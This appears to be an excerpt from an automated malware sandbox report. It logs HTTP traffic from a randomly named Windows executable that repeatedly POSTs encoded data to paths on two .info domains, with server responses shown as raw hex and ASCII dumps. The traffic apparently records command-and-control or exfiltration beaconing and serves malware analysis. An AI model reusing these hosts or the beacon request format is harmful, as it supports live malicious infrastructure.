                                                                      Content-Length: 146
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 08:40:49 GMT
                                                                      Server: nginx
                                                                      X-Cache: BYPASS
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      29192.168.2.45003247.83.1.90805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:40:54.229907036 CET731OUTPOST /ctdy/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.adadev.info
                                                                      Origin: http://www.adadev.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 202
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.adadev.info/ctdy/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 30 61 6e 71 6a 69 36 67 51 54 37 79 4c 30 76 4c 7a 51 4e 4d 74 49 65 4e 79 2b 6f 49 4b 58 5a 53 6d 48 63 2b 49 6a 57 39 4c 4f 7a 42 51 38 61 4c 55 31 38 49 48 71 78 67 51 4c 69 6b 54 6c 4b 31 43 32 31 45 74 46 71 63 6f 67 6f 67 51 51 57 43 47 69 51 37 50 52 30 53 31 32 6f 7a 36 30 2f 74 39 4a 39 32 48 2b 65 48 45 46 68 30 6e 49 45 6a 36 4f 4c 70 4e 64 2f 30 43 66 48 31 50 6a 43 36 66 44 41 4b 4f 42 5a 35 78 4d 6a 62 33 74 44 31 37 56 57 5a 77 75 71 30 34 45 52 55 48 70 78 2b 4a 39 59 39 6f 64 6a 47 6b 56 30 56 57 39 56 39 69 70 51 32 7a 50 66 67 55 79 53 47 58 5a 49 79 2b 67 3d 3d
                                                                      Data Ascii: 88v07=0anqji6gQT7yL0vLzQNMtIeNy+oIKXZSmHc+IjW9LOzBQ8aLU18IHqxgQLikTlK1C21EtFqcogogQQWCGiQ7PR0S12oz60/t9J92H+eHEFh0nIEj6OLpNd/0CfH1PjC6fDAKOBZ5xMjb3tD17VWZwuq04ERUHpx+J9Y9odjGkV0VW9V9ipQ2zPfgUySGXZIy+g==


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      30192.168.2.45003347.83.1.90805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:40:56.790559053 CET751OUTPOST /ctdy/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.adadev.info
                                                                      Origin: http://www.adadev.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 222
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.adadev.info/ctdy/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 30 61 6e 71 6a 69 36 67 51 54 37 79 5a 46 66 4c 2f 58 5a 4d 76 6f 65 4d 73 75 6f 49 54 48 5a 65 6d 48 51 2b 49 6d 32 54 4c 38 58 42 54 64 71 4c 56 30 38 49 45 71 78 67 59 72 69 6c 4e 56 4b 36 43 78 38 6e 74 45 57 63 6f 67 73 67 51 52 6d 43 47 54 51 38 4f 42 30 51 38 57 6f 78 6e 6b 2f 74 39 4a 39 32 48 2b 4c 69 45 46 70 30 6d 37 73 6a 36 76 4c 75 4f 64 2f 7a 53 50 48 31 59 7a 43 45 66 44 41 34 4f 45 6b 69 78 4f 72 62 33 73 7a 31 36 45 57 65 36 75 71 32 6c 30 51 49 58 4a 51 72 49 5a 42 68 33 65 37 63 6b 30 34 56 65 62 59 6e 7a 59 78 68 68 50 37 54 4a 31 62 79 61 61 31 37 6c 6e 34 6a 35 53 2f 61 78 70 75 35 36 4a 48 75 54 53 37 53 55 2f 4d 3d
                                                                      Data Ascii: 88v07=0anqji6gQT7yZFfL/XZMvoeMsuoITHZemHQ+Im2TL8XBTdqLV08IEqxgYrilNVK6Cx8ntEWcogsgQRmCGTQ8OB0Q8Woxnk/t9J92H+LiEFp0m7sj6vLuOd/zSPH1YzCEfDA4OEkixOrb3sz16EWe6uq2l0QIXJQrIZBh3e7ck04VebYnzYxhhP7TJ1byaa17ln4j5S/axpu56JHuTS7SU/M=


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      31192.168.2.45003447.83.1.90805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:40:59.343803883 CET10833OUTPOST /ctdy/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.adadev.info
                                                                      Origin: http://www.adadev.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 10302
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.adadev.info/ctdy/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 30 61 6e 71 6a 69 36 67 51 54 37 79 5a 46 66 4c 2f 58 5a 4d 76 6f 65 4d 73 75 6f 49 54 48 5a 65 6d 48 51 2b 49 6d 32 54 4c 38 66 42 54 75 79 4c 55 58 6b 49 46 71 78 67 62 72 69 6f 4e 56 4b 6a 43 33 55 37 74 45 61 6d 6f 6a 59 67 66 54 65 43 41 6e 38 38 48 42 30 51 2b 57 6f 77 36 30 2f 34 39 4a 74 36 48 2b 62 69 45 46 70 30 6d 2b 6f 6a 38 2b 4c 75 49 64 2f 30 43 66 48 51 50 6a 43 2f 66 44 6f 6f 4f 46 30 79 79 2f 4c 62 32 4d 6a 31 35 32 75 65 79 75 71 77 31 6b 51 41 58 4a 64 37 49 59 70 74 33 64 6e 69 6b 30 38 56 63 39 42 75 70 4c 38 2b 67 66 37 55 5a 6c 76 4e 55 4b 4e 68 73 67 77 36 31 43 50 64 6f 4c 32 57 2f 2b 76 6c 42 54 75 56 49 71 74 57 6d 59 79 73 38 6d 68 52 46 39 4f 5a 2b 4d 2f 51 38 59 51 6c 32 50 31 6e 73 46 57 78 55 6d 4b 31 35 32 75 4c 66 67 56 56 38 50 42 34 76 66 50 68 41 72 67 47 31 66 5a 6b 6b 38 6e 65 37 76 4d 6a 58 33 68 77 32 63 6d 58 6b 49 4e 54 48 61 39 4c 34 75 43 4b 72 56 72 4f 33 45 45 54 2b 46 61 6d 2f 46 58 46 66 52 79 6a 36 77 45 41 70 79 44 6f 67 31 58 64 [TRUNCATED]
                                                                      Data Ascii: 88v07=0anqji6gQT7yZFfL/XZMvoeMsuoITHZemHQ+Im2TL8fBTuyLUXkIFqxgbrioNVKjC3U7tEamojYgfTeCAn88HB0Q+Wow60/49Jt6H+biEFp0m+oj8+LuId/0CfHQPjC/fDooOF0yy/Lb2Mj152ueyuqw1kQAXJd7IYpt3dnik08Vc9BupL8+gf7UZlvNUKNhsgw61CPdoL2W/+vlBTuVIqtWmYys8mhRF9OZ+M/Q8YQl2P1nsFWxUmK152uLfgVV8PB4vfPhArgG1fZkk8ne7vMjX3hw2cmXkINTHa9L4uCKrVrO3EET+Fam/FXFfRyj6wEApyDog1Xd03WWzNHMUlztekCZTsxK99xhm3Y7kViahf/WlY2AR02FQZlmN9oFOg2o5PbBAFxZN6v7MN+NuyZOK9GYLo530PUXcxe1kKRS66QC4y4pHsgCJlWbOLrSaTpln7esvbXhfYqxOkRsYoizIy9glRwJBUKUwtZ4zpzi4bTBGZ8YFk5pGDBvqM5IEq09WGLh6H5/WqHn4rRs3DWDmYQ5jAyq1ygmyDME7bWOVA9nOypQRio4GFJl8R2UoKqr3x63q7VyPcCMKaKL5lBS4Dp7O3hzCRcF8BpLr6iN7j5m2+gfrATKGzyAtalsI42ygcRllRJEjXZ5TuJmYCW/t/2TqXpj9hNRzlC+9uRu3pxMWTbLLDm1uOvBdY0CF9tZs0QQ56mbcmVapDFhstm2FvAFTxmfgxSuB5ifAXRiPBM0kBOvJ/VQAC2j800i6TTZYIY7M3H/mh3d3rlGHJrZRh6PI4c2yQrjD+Oew9eRP/QYcMAFQLaW2bF+RtB3bVzZp9N3b1TbzQ+El/pXqsNLE8otVlBSq1pOOGh8h37D0VJkV2cLlaVm6USyMl+5xkpOpQss4B3m8qQksSCqRKzW8ROsrPxR9mGhLEGWCu7j68+U3zviCgEDVQVqKjr7pq8TpsQljPc4kKpk8MKaY7dKRQSzLMLYbB0IFMMvi0RWVc [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      32192.168.2.45003547.83.1.90805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:41:01.886828899 CET465OUTGET /ctdy/?O2=aP0Tt&88v07=5YPKgWGFQCLPNGrM6Bx2/r3NiP9oDWgtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZFTIkqAxP+kzEnb1pVMGGKhBzsI5+lu+iJts= HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.adadev.info
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 09:41:03.473222971 CET139INHTTP/1.1 567 unknown
                                                                      Server: nginx/1.18.0
                                                                      Date: Mon, 13 Jan 2025 08:41:03 GMT
                                                                      Content-Length: 17
                                                                      Connection: close
                                                                      Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                      Data Ascii: Request too large


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      33192.168.2.450036188.114.96.3805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:41:08.542134047 CET734OUTPOST /8rr3/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.cifasnc.info
                                                                      Origin: http://www.cifasnc.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 202
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.cifasnc.info/8rr3/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 76 4c 55 42 6c 6d 50 52 4b 6b 32 62 79 65 46 2f 71 67 46 34 34 76 6f 43 50 52 63 52 77 65 32 69 56 65 70 64 6c 52 2f 5a 76 52 74 61 54 55 34 38 6d 64 65 73 35 4b 6b 4a 4a 53 69 69 59 4b 33 56 70 4c 76 68 42 57 48 70 65 57 2f 77 66 6e 56 71 41 39 6f 57 2b 32 58 35 4a 30 62 59 34 4d 2f 30 56 56 50 70 6f 43 31 6e 36 34 50 6e 44 57 34 77 66 4d 43 66 69 6e 63 30 42 57 6f 66 66 51 72 69 6c 4b 65 4f 62 2b 2b 72 75 76 59 71 65 79 37 50 56 59 31 52 73 5a 64 6c 6e 4e 79 6f 58 38 39 47 69 41 53 2f 70 65 38 57 37 4b 47 74 50 44 37 74 35 30 53 71 33 31 4e 53 44 76 6c 4f 68 39 45 45 59 67 3d 3d
                                                                      Data Ascii: 88v07=vLUBlmPRKk2byeF/qgF44voCPRcRwe2iVepdlR/ZvRtaTU48mdes5KkJJSiiYK3VpLvhBWHpeW/wfnVqA9oW+2X5J0bY4M/0VVPpoC1n64PnDW4wfMCfinc0BWoffQrilKeOb++ruvYqey7PVY1RsZdlnNyoX89GiAS/pe8W7KGtPD7t50Sq31NSDvlOh9EEYg==
                                                                      Jan 13, 2025 09:41:09.054277897 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 08:41:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      x-pingback: http://cifasnc.info/xmlrpc.php
                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      last-modified: Mon, 13 Jan 2025 08:41:08 GMT
                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      vary: Accept-Encoding,User-Agent
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qxBKjvEuN9gprfaPeo8Cu3618eXqC6kTqgsVJWDseemkfOnlBJ%2FDH%2FJQC0Nc5srKeTmv%2FgaxbNF3oImaM59vSKQkG0AoREa8I8LDyPWHpFaBq1GrCO3rlhn2468wFQSnKZ2w"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 901415e6ea3a423d-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1690&rtt_var=845&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=734&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 35 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 b4 48
                                                                      Data Ascii: 512Wo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L H
                                                                      Jan 13, 2025 09:41:09.054305077 CET1162INData Raw: 38 13 b7 a0 91 a7 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35 36 68 e2 5b 54 68 63
                                                                      Data Ascii: 8DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bm'N8oxD,R6k;|(a3o)q|PJ40L&rhVXuDT2 ,!,m0%


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      34192.168.2.450037188.114.96.3805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:41:11.096539021 CET754OUTPOST /8rr3/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.cifasnc.info
                                                                      Origin: http://www.cifasnc.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 222
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.cifasnc.info/8rr3/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 76 4c 55 42 6c 6d 50 52 4b 6b 32 62 67 75 31 2f 6f 44 74 34 2b 50 6f 46 41 78 63 52 37 2b 32 6d 56 5a 68 64 6c 53 7a 4a 73 6e 39 61 54 32 51 38 6e 66 6d 73 36 4b 6b 4a 43 79 69 37 46 61 33 53 70 4c 72 44 42 57 72 70 65 53 76 77 66 6e 6c 71 41 4b 38 58 38 6d 58 2f 50 30 62 57 6e 63 2f 30 56 56 50 70 6f 43 78 4e 36 38 62 6e 41 6e 6f 77 66 70 69 41 38 58 63 31 47 57 6f 66 62 51 72 59 6c 4b 65 38 62 38 4b 4e 75 72 6f 71 65 79 72 50 56 71 4e 65 6d 5a 64 6a 36 39 7a 62 54 35 4d 59 6f 69 6a 68 72 65 77 34 34 37 61 36 4f 46 32 33 6f 46 7a 39 6c 31 70 68 65 6f 73 36 73 2b 35 4e 44 68 6b 42 4c 64 7a 63 75 48 4b 48 43 6b 71 39 58 46 2b 72 65 50 4d 3d
                                                                      Data Ascii: 88v07=vLUBlmPRKk2bgu1/oDt4+PoFAxcR7+2mVZhdlSzJsn9aT2Q8nfms6KkJCyi7Fa3SpLrDBWrpeSvwfnlqAK8X8mX/P0bWnc/0VVPpoCxN68bnAnowfpiA8Xc1GWofbQrYlKe8b8KNuroqeyrPVqNemZdj69zbT5MYoijhrew447a6OF23oFz9l1pheos6s+5NDhkBLdzcuHKHCkq9XF+rePM=
                                                                      Jan 13, 2025 09:41:11.603437901 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 08:41:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      x-pingback: http://cifasnc.info/xmlrpc.php
                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      last-modified: Mon, 13 Jan 2025 08:41:11 GMT
                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      vary: Accept-Encoding,User-Agent
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4XPBm9Y4eZBJ1N9LjSAyhym9waKlRjA8wpV%2FH0FoM9jfxx1x%2FrI0k%2BJMHFlOmAYJC82O9xXmwsvgTvmHQ8301PL38UwHO%2FYh2bW3TYpIw9SUeQsL8foEJJH1a253wJ1MRoUk"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 901415f6da8442ee-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1725&min_rtt=1725&rtt_var=862&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=754&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20
                                                                      Data Ascii: 51eWo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L
                                                                      Jan 13, 2025 09:41:11.603498936 CET1159INData Raw: b4 48 38 13 b7 a0 91 a7 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35 36 68 e2 5b 54
                                                                      Data Ascii: H8DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bm'N8oxD,R6k;|(a3o)q|PJ40L&rhVXuDT2 ,!,m0%


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      35192.168.2.450038188.114.96.3805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:41:13.667427063 CET10836OUTPOST /8rr3/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.cifasnc.info
                                                                      Origin: http://www.cifasnc.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 10302
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.cifasnc.info/8rr3/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 76 4c 55 42 6c 6d 50 52 4b 6b 32 62 67 75 31 2f 6f 44 74 34 2b 50 6f 46 41 78 63 52 37 2b 32 6d 56 5a 68 64 6c 53 7a 4a 73 6e 31 61 53 48 77 38 6e 34 4b 73 37 4b 6b 4a 42 79 69 2b 46 61 33 44 70 50 2f 48 42 57 58 35 65 51 6e 77 46 45 74 71 49 62 38 58 32 6d 58 2f 44 55 62 58 34 4d 2f 68 56 56 2b 69 6f 43 68 4e 36 38 62 6e 41 6b 67 77 57 63 43 41 2b 58 63 30 42 57 6f 54 66 51 71 33 6c 4b 47 47 62 38 4f 37 75 59 67 71 64 57 33 50 46 50 5a 65 37 4a 64 68 71 74 7a 44 54 35 49 35 6f 69 76 6c 72 64 73 53 34 37 2b 36 50 77 4c 62 37 51 54 68 35 56 46 6f 47 34 6c 46 67 64 64 4e 45 78 74 36 4e 2b 76 53 78 48 4c 76 44 57 53 77 54 68 43 4b 64 6f 48 56 58 30 2b 63 61 54 4d 6c 39 38 6b 78 6b 41 2f 58 31 59 61 5a 77 47 56 72 61 33 57 44 66 66 31 68 73 70 52 6c 2b 36 68 6a 5a 4b 69 66 72 4b 2b 73 58 37 6f 6c 77 50 69 2f 30 65 71 6d 62 46 39 32 43 6f 34 52 54 61 4d 52 74 33 7a 68 38 6d 63 66 7a 6e 70 38 2f 31 59 61 67 57 73 43 65 4e 43 36 50 42 65 70 7a 4f 51 59 53 56 4e 2f 6b 46 48 4b 53 4e 4f 77 [TRUNCATED]
                                                                      Data Ascii: 88v07=vLUBlmPRKk2bgu1/oDt4+PoFAxcR7+2mVZhdlSzJsn1aSHw8n4Ks7KkJByi+Fa3DpP/HBWX5eQnwFEtqIb8X2mX/DUbX4M/hVV+ioChN68bnAkgwWcCA+Xc0BWoTfQq3lKGGb8O7uYgqdW3PFPZe7JdhqtzDT5I5oivlrdsS47+6PwLb7QTh5VFoG4lFgddNExt6N+vSxHLvDWSwThCKdoHVX0+caTMl98kxkA/X1YaZwGVra3WDff1hspRl+6hjZKifrK+sX7olwPi/0eqmbF92Co4RTaMRt3zh8mcfznp8/1YagWsCeNC6PBepzOQYSVN/kFHKSNOwUfbUpKB0XPrDUk8jZBP9hZ46zXmY4JIE3kvOso6ZeJFfBc1AN/WhN83oFOOxOos5XQJ0lmpt4S1zgKl1faiS/bSgrdrHeSev9mfs+w+DtIboHHiyjmEtSP/drINqMnqaXp0GcOU+S+MWsKb4FJksJ1tJ9TfCqyxmEYIeNQF0DfMzk8kjNuTxRIsEuu1iF8wnW5T6iyvLIZOt26io5/NfxY/GqDwpDlJ5uUOO5bKVuNrbnpLwqgFSwB2j37N7WqjkgNrSXc0et8HJiomuoYJFeXzd29RR2DmJgGlhqeOnrzlHUFqLeLx3sj3R57qeJgiRf1tefY+XzjhOEWH6BFJJvmnPE7twU946IgtoLsTw6XXKYArpIqphSfNqW5wjih9MBasu7KXu22Jy+HQRojRIGUlnSJ/W6YjSQBl3wHMGk0du8ftnpUf+KG95GugLYgON7fenstrFJUPhjenWYe+kS5f55HehjVc7fUkfJz64BLpJbQWj7qZFnokfzgG7KKvo5Ccfq9ji4FG2OFQvhYk5nhZpvwufIa1qf6AJrLxspmv9g8IfY0na8dCT73FI/c95yN4h/mlJ6vtgWUQvNZPotWjBCvKXP58cW/J9dVwIVQY93zwvZrpbBPY5SUWtS93P3doukiqsEyYiW0wh5JT4p+NShwfeA3D0z9 [TRUNCATED]
                                                                      Jan 13, 2025 09:41:14.168010950 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 08:41:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      x-pingback: http://cifasnc.info/xmlrpc.php
                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      last-modified: Mon, 13 Jan 2025 08:41:14 GMT
                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      vary: Accept-Encoding,User-Agent
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BbjJUBOlFhkpEs5psCZdmLQGDb2CzbU%2BexumrguvZnk%2BV48wAVR1KWDSvmtjD7aRsVgkyXPsiLyC9yImWeUdiVpS1zxPlj4EZ9KyNgF48SY%2FeSAdXxP4LEB2rZOJOjhqkb1z"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 90141606c9888ca1-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1989&min_rtt=1989&rtt_var=994&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10836&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
